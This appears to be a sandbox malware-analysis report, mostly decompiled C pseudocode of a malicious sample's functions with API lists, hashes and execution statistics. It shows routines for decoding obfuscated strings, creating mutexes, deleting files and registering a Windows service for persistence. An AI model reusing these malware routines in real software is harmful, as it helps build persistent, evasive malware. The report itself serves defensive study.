                  								 *(_t128 + 0x2af4) =  *(_t128 + 0x2af4) - _t153;
                  								_t136 = _v16;
                  								_t145 =  *(_t128 + 0x2af4);
                  								 *(_t128 + 0x2af0) =  *(_t128 + 0x2af0) + _t153 & 0x00007fff;
                  								__eflags = _t136;
                  								if(_t136 < 0) {
                  									goto L3;
                  								}
                  								__eflags = _t136 - 1;
                  								if(_t136 != 1) {
                  									L18:
                  									__eflags = _t136;
                  									if(_t136 == 0) {
                  										__eflags = _t145;
                  										_t137 = 0xfffffffb;
                  										_t111 =  !=  ? _t137 : 1;
                  										return  !=  ? _t137 : 1;
                  									}
                  									__eflags =  *(_t148 + 0x10);
                  									if( *(_t148 + 0x10) == 0) {
                  										L8:
                  										_push(0xfffffffb);
                  										goto L23;
                  									}
                  									_t143 = _v24;
                  									continue;
                  								}
                  								__eflags = _v20;
                  								if(_v20 == 0) {
                  									goto L8;
                  								}
                  								goto L18;
                  							}
                  							goto L3;
                  						}
                  						_t154 =  *((intOrPtr*)(__ecx + 0x10));
                  						__eflags = _t93 - _t154;
                  						_t155 =  <  ? _t93 : _t154;
                  						memcpy( *(__ecx + 0xc),  *(_t128 + 0x2af0) + 0x2b04 + _t128, _t155);
                  						 *(_t148 + 0xc) =  *(_t148 + 0xc) + _t155;
                  						 *(_t148 + 0x10) =  *(_t148 + 0x10) - _t155;
                  						 *((intOrPtr*)(_t148 + 0x14)) =  *((intOrPtr*)(_t148 + 0x14)) + _t155;
                  						 *(_t128 + 0x2af4) =  *(_t128 + 0x2af4) - _t155;
                  						__eflags =  *(_t128 + 0xab04);
                  						 *(_t128 + 0x2af0) =  *(_t128 + 0x2af0) + _t155 & 0x00007fff;
                  						if( *(_t128 + 0xab04) != 0) {
                  							L14:
                  							return 0;
                  						}
                  						__eflags =  *(_t128 + 0x2af4);
                  						if( *(_t128 + 0x2af4) != 0) {
                  							goto L14;
                  						}
                  						return 1;
                  					}
                  					_v8 =  *((intOrPtr*)(__ecx + 4));
                  					_v12 =  *((intOrPtr*)(__ecx + 0x10));
                  					_t126 = E00404AD4(_t128,  *__ecx,  &_v8,  *(__ecx + 0xc),  *(__ecx + 0xc),  &_v12, _t143 | 0x00000004);
                  					_t139 = _v8;
                  					 *(_t128 + 0xab04) = _t126;
                  					 *__ecx =  *__ecx + _t139;
                  					 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(__ecx + 4)) - _t139;
                  					 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(__ecx + 8)) + _t139;
                  					 *((intOrPtr*)(__ecx + 0x30)) =  *((intOrPtr*)(_t128 + 0x1c));
                  					_t141 = _v12;
                  					 *(__ecx + 0xc) =  *(__ecx + 0xc) + _t141;
                  					 *((intOrPtr*)(__ecx + 0x10)) =  *((intOrPtr*)(__ecx + 0x10)) - _t141;
                  					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + _t141;
                  					__eflags = _t126;
                  					if(__eflags < 0) {
                  						goto L3;
                  					}
                  					if(__eflags == 0) {
                  						return 1;
                  					}
                  					_t34 = _t128 + 0xab04;
                  					 *_t34 =  *(_t128 + 0xab04) | 0xffffffff;
                  					__eflags =  *_t34;
                  					goto L8;
                  				}
                  				L3:
                  				_push(0xfffffffd);
                  				goto L23;
                  			}






























                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 0HCw$Ab@
                  • API String ID: 0-707421244
                  • Opcode ID: 33f034056c3a3427ec488e59f39741281436f7c45068a44fc4d7b3f08e725971
                  • Instruction ID: 085e4857d5f96ebe99bd6dbc6265157c6608e9d95e27a4949ae474babd6914cb
                  • Opcode Fuzzy Hash: 33f034056c3a3427ec488e59f39741281436f7c45068a44fc4d7b3f08e725971
                  • Instruction Fuzzy Hash: 7A618171B00606AFCB58CF69CA88996B3B4FF04314F14827ADC19DB6C5DB78A950CF95
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 91%
                  			E00405FA4(void* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a4) {
                  				intOrPtr* _v8;
                  				void* _t28;
                  				void* _t44;
                  				void* _t45;
                  				intOrPtr _t46;
                  				signed int _t56;
                  				void* _t78;
                  				void* _t84;
                  				void* _t86;
                  				intOrPtr _t89;
                  				intOrPtr _t91;
                  				char* _t92;
                  				void* _t93;
                  
                  				_t46 = _a4;
                  				_v8 = __edx;
                  				E00401503(_t46, 0x808);
                  				E00405F15(_t46, E00401A52(0x4120d0, 0x680f9b3));
                  				L00401B09(_t25);
                  				_t28 = E00401A52(0x4122a0, 0x680f9b3);
                  				_t3 = _t46 + 0x400; // 0x4065cd
                  				 *0x4143a4(_t3, 0x200, _t28, __ecx, _t46, _t78, _t86, _t45, __ecx);
                  				L00401B09(_t28);
                  				_t80 = _v8;
                  				_t56 = 3;
                  				_t89 = E004014F2(( *((intOrPtr*)(_v8 + 4)) + 2) / _t56 << 2);
                  				_v8 = _t89;
                  				if(_t89 != 0) {
                  					_a4 = E0040156A( *_t80,  *((intOrPtr*)(_t80 + 4)), _t89);
                  					_t84 = (GetTickCount() & 0x0000000f) + 4;
                  					_t14 = E0040162B(_t89, _a4) + 1; // 0x1
                  					_t91 = E004014F2(_t14 + _t84);
                  					 *((intOrPtr*)(_t46 + 0x800)) = _t91;
                  					if(_t91 == 0) {
                  						_t85 = _v8;
                  					} else {
                  						E00401E27(_t91, _t84);
                  						_t92 = _t91 + _t84;
                  						_t85 = _v8;
                  						 *_t92 = 0x3d;
                  						_t93 = _t92 + 1;
                  						_t44 = E00401680(_v8, _a4, _t93);
                  						_t18 = _t46 + 0x800; // 0xc885c70e
                  						 *((intOrPtr*)(_t46 + 0x804)) = _t93 + _t44 -  *_t18;
                  					}
                  					E00401532(_t85);
                  				}
                  				return 0 |  *((intOrPtr*)(_t46 + 0x800)) != 0x00000000;
                  			}

















                  APIs
                    • Part of subcall function 00405F15: lstrlenW.KERNEL32(00000000,?,00000000,004061CD,?,004061CD,?), ref: 00405F26
                    • Part of subcall function 00405F15: GetTickCount.KERNEL32(?,004061CD,?), ref: 00405F2F
                  • _snwprintf.NTDLL ref: 00406000
                    • Part of subcall function 004014F2: GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                    • Part of subcall function 004014F2: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  • GetTickCount.KERNEL32 ref: 00406042
                    • Part of subcall function 00401E27: GetTickCount.KERNEL32(-00000004,00000000,004061CD), ref: 00401E39
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountTick$Heap$AllocateProcess_snwprintflstrlen
                  • String ID: g8Cw
                  • API String ID: 459781281-3103284439
                  • Opcode ID: 76b03827719990e30b0c101892e01b597c257d1c543933898f8cee2b7d7ceefb
                  • Instruction ID: 00cdad927da0c0ef8d73a3e5ef527bbb7d9062bc05b5f9e08202af6a880e88a8
                  • Opcode Fuzzy Hash: 76b03827719990e30b0c101892e01b597c257d1c543933898f8cee2b7d7ceefb
                  • Instruction Fuzzy Hash: BC31B531B000109BCB14EF658841A9E7796AFC4754F29817EED0AAF3D6DE789D0187D8
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 23%
                  			E0040F7A0() {
                  				char _v8;
                  				char _v528;
                  				intOrPtr _t19;
                  				void* _t24;
                  				char _t32;
                  				void* _t33;
                  				void* _t35;
                  
                  				_t32 = 0;
                  				_v8 = 0;
                  				_t24 =  *0x412ef4(0, 0, 0xf003f);
                  				if(_t24 != 0) {
                  					_t34 = E00401A52(0x4129d0, 0x4bf67e71);
                  					 *0x4143a4( &_v528, 0x104, _t9, 0x416840, _t33);
                  					L00401B09(_t34);
                  					_t35 =  *0x4134c8(_t24, 0x416530, 0x416530, 0x12, 0x10, 2, 0,  &_v528, 0, 0, 0, 0, 0);
                  					if(_t35 != 0) {
                  						if(E0040F504(_t24,  &_v8) != 0) {
                  							 *0x41353c(_t35, 1, _v8);
                  							E00401532(_v8);
                  						}
                  					} else {
                  						_t35 =  *0x413594(_t24, 0x416530, 0x10);
                  					}
                  					if(_t35 != 0) {
                  						_t19 =  *0x41315c(_t35, _t32, _t32);
                  						_t32 = _t19;
                  						 *0x4135a4(_t35);
                  					}
                  					E0040F6D0(_t24);
                  					 *0x4135a4(_t24);
                  				}
                  				return _t32;
                  			}











                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: _snwprintf
                  • String ID: 0eA$g8Cw
                  • API String ID: 3988819677-1352154256
                  • Opcode ID: 8788b05d66e6191db14083dcb274117b82c263dd676d547b19645e5bf22e022a
                  • Instruction ID: eaef89646e70cf25437eea923daa7feb7edf07035885503fb66571f4c5335789
                  • Opcode Fuzzy Hash: 8788b05d66e6191db14083dcb274117b82c263dd676d547b19645e5bf22e022a
                  • Instruction Fuzzy Hash: EF21F3726013147BD7206B665D49FEB3A6D9B85B01F00417ABD06F72D2DAB88E0496AC
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E0040FC67() {
                  				void* _t9;
                  				int _t10;
                  				void* _t15;
                  				intOrPtr* _t21;
                  				intOrPtr* _t22;
                  
                  				_t22 =  *0x4164e4;
                  				_t21 = 0x4164e4;
                  				if(_t22 == 0) {
                  					return _t9;
                  				}
                  				do {
                  					_t15 = 0;
                  					if( *((intOrPtr*)(_t22 + 8)) == 1 ||  *((intOrPtr*)(_t22 + 8)) == 2) {
                  						_t15 = 1;
                  					}
                  					if( *((intOrPtr*)(_t22 + 8)) == 3) {
                  						_t10 = WaitForSingleObject( *(_t22 + 0x14), 0);
                  						if(_t10 == 0) {
                  							 *((intOrPtr*)(_t22 + 0x10))( *((intOrPtr*)(_t22 + 0xc)), _t10, _t10);
                  							E0040192A( *((intOrPtr*)(_t22 + 0xc)));
                  							_t10 = CloseHandle( *(_t22 + 0x14));
                  							_t15 = 1;
                  						}
                  					}
                  					if(_t15 == 0) {
                  						_t21 = _t22;
                  					} else {
                  						 *_t21 =  *_t22;
                  						_t10 = E00401532(_t22);
                  					}
                  					_t22 =  *_t21;
                  				} while (_t22 != 0);
                  				return _t10;
                  			}









                  APIs
                  • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040FC95
                  • CloseHandle.KERNEL32(?), ref: 0040FCB2
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandleObjectSingleWait
                  • String ID: dA
                  • API String ID: 528846559-3833285433
                  • Opcode ID: 3fd25aa55a6274f4f7e9cc92725da2f21c8c3f2147d4135f88846fc5401ef8fd
                  • Instruction ID: 9783dac627fe2aad0d055cd04b4053eec809d95b972e8a9730baec20d1199667
                  • Opcode Fuzzy Hash: 3fd25aa55a6274f4f7e9cc92725da2f21c8c3f2147d4135f88846fc5401ef8fd
                  • Instruction Fuzzy Hash: E601B1322047118FE7304F65D999923B3A8BF44715711893BEC4363BA0C334AC48C648
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 68%
                  			E0040C5A7(void* __eflags) {
                  				short _v132;
                  				void* _t5;
                  				void* _t11;
                  
                  				_t5 = E00401A52(0x4127e0, 0x72fc3a35);
                  				 *0x4143a4( &_v132, 0x40, _t5,  *0x415488);
                  				L00401B09(_t5);
                  				_t11 = CreateEventW(0, 0, 0,  &_v132);
                  				 *0x414e6c = _t11;
                  				return 0 | _t11 != 0x00000000;
                  			}







                  APIs
                  • _snwprintf.NTDLL ref: 0040C5CF
                  • CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 0040C5E8
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateEvent_snwprintf
                  • String ID: g8Cw
                  • API String ID: 3138640819-3103284439
                  • Opcode ID: bf91c9978e232df667675dfab0b91fafffa405702bdcbacc6dac383674977833
                  • Instruction ID: 966a77967990d1c2b3e105985163cbd3e7ea594235671e381eb49e2a5e3bd5e9
                  • Opcode Fuzzy Hash: bf91c9978e232df667675dfab0b91fafffa405702bdcbacc6dac383674977833
                  • Instruction Fuzzy Hash: BDF0A7717001146BD701ABA96C05AFB36ACEB44304F00803EF905D7190EE34D81087DD
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 68%
                  			E0040C54E(void* __eflags) {
                  				short _v132;
                  				void* _t5;
                  				void* _t10;
                  
                  				_t5 = E00401A52(0x412340, 0x72fc3a35);
                  				 *0x4143a4( &_v132, 0x40, _t5,  *0x415488);
                  				L00401B09(_t5);
                  				_t10 = CreateMutexW(0, 0,  &_v132);
                  				 *0x41365c = _t10;
                  				return 0 | _t10 != 0x00000000;
                  			}







                  APIs
                  • _snwprintf.NTDLL ref: 0040C576
                  • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 0040C58E
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateMutex_snwprintf
                  • String ID: g8Cw
                  • API String ID: 451050361-3103284439
                  • Opcode ID: e49b4b3da7b435a57b3e4e9c9e5cf4acdb66041148267d6b0e68d6df042f3639
                  • Instruction ID: 36c13beeff52031c9d9f833bd8c6959bb0ee47b01addbbb580c4d20d437467e3
                  • Opcode Fuzzy Hash: e49b4b3da7b435a57b3e4e9c9e5cf4acdb66041148267d6b0e68d6df042f3639
                  • Instruction Fuzzy Hash: F5F0EC717041145BD7146BA96C06BEA376CEB44305F00817EFA09E72D0EE34D91047DD
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 68%
                  			E0040C4F5(void* __eflags) {
                  				short _v132;
                  				void* _t5;
                  				void* _t10;
                  
                  				_t5 = E00401A52(0x4128e0, 0x72fc3a35);
                  				 *0x4143a4( &_v132, 0x40, _t5,  *0x415488);
                  				L00401B09(_t5);
                  				_t10 = CreateMutexW(0, 0,  &_v132);
                  				 *0x41548c = _t10;
                  				return 0 | _t10 != 0x00000000;
                  			}







                  APIs
                  • _snwprintf.NTDLL ref: 0040C51D
                  • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 0040C535
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateMutex_snwprintf
                  • String ID: g8Cw
                  • API String ID: 451050361-3103284439
                  • Opcode ID: 1cf742fb4f74ba7d072dd59c1caf93188d0326523d257606fcc74e63f0729243
                  • Instruction ID: 146b9e719d585fa1db09a36da7744ebe958f35a2f64565dee515f9001fd86055
                  • Opcode Fuzzy Hash: 1cf742fb4f74ba7d072dd59c1caf93188d0326523d257606fcc74e63f0729243
                  • Instruction Fuzzy Hash: 3FF0E5717442149BD700ABA9AC06BEE36ACEB44305F00803EFA09EB2D0EE3498148BDD
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 82%
                  			E0040F292() {
                  				void* _t3;
                  				void* _t7;
                  				void* _t10;
                  				void* _t15;
                  				void* _t18;
                  				void* _t19;
                  
                  				if( *0x415f4c == 0) {
                  					E0040F227();
                  				} else {
                  					E0040F214();
                  				}
                  				E00401503(0x416840, 0x104);
                  				_t3 = E00401A52(0x412bb0, 0x4bf67e71);
                  				_t19 = _t3;
                  				 *0x4143a4(0x416840, 0x104, _t19, 0x416a48, 0x416530, _t15, _t18, _t7);
                  				_t10 = _t19;
                  				return HeapFree(GetProcessHeap(), 0, _t10);
                  			}










                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: _snwprintf
                  • String ID: @hA$g8Cw
                  • API String ID: 3988819677-2636106944
                  • Opcode ID: 732ce19849883ad6b6ae5baab8f4a74ee0b3467da4a84f7d802fc72968657f34
                  • Instruction ID: e972b69ea5731f996dd58b1a7c700a453acaa9277561cdf85d49239cb67cc4b6
                  • Opcode Fuzzy Hash: 732ce19849883ad6b6ae5baab8f4a74ee0b3467da4a84f7d802fc72968657f34
                  • Instruction Fuzzy Hash: D4E022203000106BC2207286AC457FB114ACBC2399B2180BFF90AB62D2CA7D8C06C37E
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 50%
                  			E0040F227() {
                  				void* _t3;
                  				void* _t8;
                  				void* _t10;
                  				void* _t13;
                  				void* _t14;
                  
                  				 *0x414c14(0, 0x1c, 0, 0, 0x416a48, _t10, _t13);
                  				_t3 = E00401A52(0x412df0, 0x4bf67e71);
                  				_t14 = _t3;
                  				 *0x4143a4(0x416a48, 0x104, _t14, 0x416a48, 0x416530);
                  				_t8 = _t14;
                  				return HeapFree(GetProcessHeap(), 0, _t8);
                  			}









                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: _snwprintf
                  • String ID: HjA$g8Cw
                  • API String ID: 3988819677-3647325788
                  • Opcode ID: 627380aad95ed75aaa38f20ecc9f6b9bc813d9b0073c6a6a7e394f29e60d905e
                  • Instruction ID: 86e21f4e142f409bbdd5896e6b5cbe9030aa6b7bc5bdc0fcc4a87da7cf4bd144
                  • Opcode Fuzzy Hash: 627380aad95ed75aaa38f20ecc9f6b9bc813d9b0073c6a6a7e394f29e60d905e
                  • Instruction Fuzzy Hash: 9FE0CD717401107BD31062656D09EF7695DDBD1FA1712403EBE0AE71D1E5748C41C27D
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 68%
                  			E004010DC(void* __eflags) {
                  				short _v524;
                  
                  				_t12 = E00401A52(0x412000, 0x7b38aa91);
                  				 *0x4143a4( &_v524, 0x104, _t3, 0x416840);
                  				L00401B09(_t12);
                  				return DeleteFileW( &_v524);
                  			}




                  0x004010f5
                  0x00401109
                  0x00401114
                  0x0040112a

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteFile_snwprintf
                  • String ID: g8Cw
                  • API String ID: 366827715-3103284439
                  • Opcode ID: dfb5d015bca185a9f7f25c1b73371922ca55bcfad04c171bb90386b752d709f9
                  • Instruction ID: 7ded67d4db3bd44581a8d62ce4f7b27048894e85998f6b6a93392d295cc14779
                  • Opcode Fuzzy Hash: dfb5d015bca185a9f7f25c1b73371922ca55bcfad04c171bb90386b752d709f9
                  • Instruction Fuzzy Hash: E5E0DF31A0031867C711B7649C0AADB3A2C8B00315F0002B6E969A7292EE789A9487DE
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E00402561(signed int _a8, signed int _a12) {
                  
                  				return RtlAllocateHeap(GetProcessHeap(), 8, _a8 * _a12);
                  			}



                  0x0040257c

                  APIs
                  • GetProcessHeap.KERNEL32(00000008,?), ref: 0040256E
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00402575
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID: )Ew
                  • API String ID: 1357844191-1605116870
                  • Opcode ID: db4b5c6fe51ac2aff8aaaddd553206b00f81b8980156135b8fd8a4c4febe71d0
                  • Instruction ID: 7b0aceb4be34622b36046658aba6f4cfe0c30366996fb5ad577a8c43a0e85ff0
                  • Opcode Fuzzy Hash: db4b5c6fe51ac2aff8aaaddd553206b00f81b8980156135b8fd8a4c4febe71d0
                  • Instruction Fuzzy Hash: 98C08C32100308ABCB009FD8ED49DAA77ACFB48A02F00C010BA18CA090DA30F6008BA4
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E004014F2(long __ecx) {
                  
                  				return RtlAllocateHeap(GetProcessHeap(), 8, __ecx);
                  			}



                  0x00401502

                  APIs
                  • GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID: )Ew
                  • API String ID: 1357844191-1605116870
                  • Opcode ID: cd1cb1f1fdb807d5aed22dfe4798381ea017b6bab775c43d41554213982bbd3b
                  • Instruction ID: f421614fde833f2996113b85f7123fd9be9ad5eab0a4f509e971bf896a641baa
                  • Opcode Fuzzy Hash: cd1cb1f1fdb807d5aed22dfe4798381ea017b6bab775c43d41554213982bbd3b
                  • Instruction Fuzzy Hash: 72A012B16001009BDE001FA49D0DA553518B740703F00C054710590090ED6422008764
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 95%
                  			E0040499D(intOrPtr* __ecx, signed int _a8) {
                  				intOrPtr _t68;
                  				signed int _t80;
                  				signed int _t83;
                  				signed int _t84;
                  				int* _t85;
                  				void* _t86;
                  
                  				_t83 = _a8;
                  				_t85 = __ecx;
                  				asm("cdq");
                  				_t80 = 3;
                  				 *(__ecx + 8) = _t83;
                  				 *((intOrPtr*)(__ecx)) = 0;
                  				 *((intOrPtr*)(__ecx + 4)) = 0;
                  				 *((intOrPtr*)(__ecx + 0xc)) = ((_t83 & 0x00000fff) + 2) / _t80 + 1;
                  				 *(__ecx + 0x14) = _t83 >> 0x0000000e & 0x00000001;
                  				asm("cdq");
                  				 *((intOrPtr*)(__ecx + 0x10)) = ((_t83 >> 0x00000002 & 0x000003ff) + 2) / _t80 + 1;
                  				_t84 = _t83 & 0x00008000;
                  				if(_t84 == 0) {
                  					_t15 = _t85 + 0x29272; // 0x29272
                  					memset(_t15, 0, 0x10000);
                  					_t86 = _t86 + 0xc;
                  				}
                  				 *((intOrPtr*)(_t85 + 0x44)) = 0;
                  				_t17 = _t85 + 0x9273; // 0x9273
                  				 *((intOrPtr*)(_t85 + 0x28)) = _t17;
                  				_t19 = _t85 + 0x9272; // 0x9272
                  				 *((intOrPtr*)(_t85 + 0x2c)) = _t19;
                  				_t21 = _t85 + 0x39272; // 0x39272
                  				_t68 = _t21;
                  				 *((intOrPtr*)(_t85 + 0x40)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x3c)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x24)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x20)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x1c)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x68)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x48)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x64)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x60)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x5c)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x58)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x38)) = 8;
                  				 *((intOrPtr*)(_t85 + 0x30)) = _t68;
                  				 *((intOrPtr*)(_t85 + 0x34)) = _t68;
                  				 *((intOrPtr*)(_t85 + 0x6c)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x54)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x50)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x4c)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x18)) = 1;
                  				 *((intOrPtr*)(_t85 + 0x70)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x74)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x78)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x7c)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x80)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x84)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x88)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x8c)) = 0;
                  				if(_t84 == 0) {
                  					_t49 = _t85 + 0x90; // 0x90
                  					memset(_t49, 0, 0x8101);
                  					_t86 = _t86 + 0xc;
                  				}
                  				_t50 = _t85 + 0x8192; // 0x8192
                  				memset(_t50, 0, 0x240);
                  				_t51 = _t85 + 0x83d2; // 0x83d2
                  				memset(_t51, 0, 0x40);
                  				return 0;
                  			}










                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset
                  • String ID:
                  • API String ID: 2221118986-0
                  • Opcode ID: 9fc025132572919f3734a29ac81ef1a2200ba00e6701f7d6fd5a461a0fe62915
                  • Instruction ID: 70126d602587bd303643ef6f1a7dad0836f0adfd5b30951eb2e943be6850c986
                  • Opcode Fuzzy Hash: 9fc025132572919f3734a29ac81ef1a2200ba00e6701f7d6fd5a461a0fe62915
                  • Instruction Fuzzy Hash: D141B2B2900B049FD320CF6AD885683FBE8FB48714B84893ED6DEC2A50D775B5448F54
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Execution Graph

                  Execution Coverage:12.4%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:10.2%
                  Total number of Nodes:186
                  Total number of Limit Nodes:3

                  Graph


                  Executed Functions

                  Memory Dump Source
                  • Source File: 00000006.00000002.302698370.00491000.00000020.00000001.sdmp, Offset: 00491000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_491000_982.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: f8b49f3466dcbdd5e63a53c087d3b72389dbc28b21cd111d0a4e51603c5f5366
                  • Instruction ID: b0547309981cd7e5451454c14efcab295934e70a4a2ab6a56e376ed63988595f
                  • Opcode Fuzzy Hash: f8b49f3466dcbdd5e63a53c087d3b72389dbc28b21cd111d0a4e51603c5f5366
                  • Instruction Fuzzy Hash: 9D90027D757075120A4577E30652989A84419D0748344406FE002004524A588838DD3A
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 409 492670-49267f call 491980 call 492600
                  Memory Dump Source
                  • Source File: 00000006.00000002.302698370.00491000.00000020.00000001.sdmp, Offset: 00491000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_491000_982.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: ab4c8c7f3a2b842a710522aa320b236c56b36bc81bbfa36c8a26bf4290abe6ea
                  • Instruction ID: 6a4c643c7c6cbb9b859e6a436b1b974e2da6e91c60c3ba4dbcfafa462cde048a
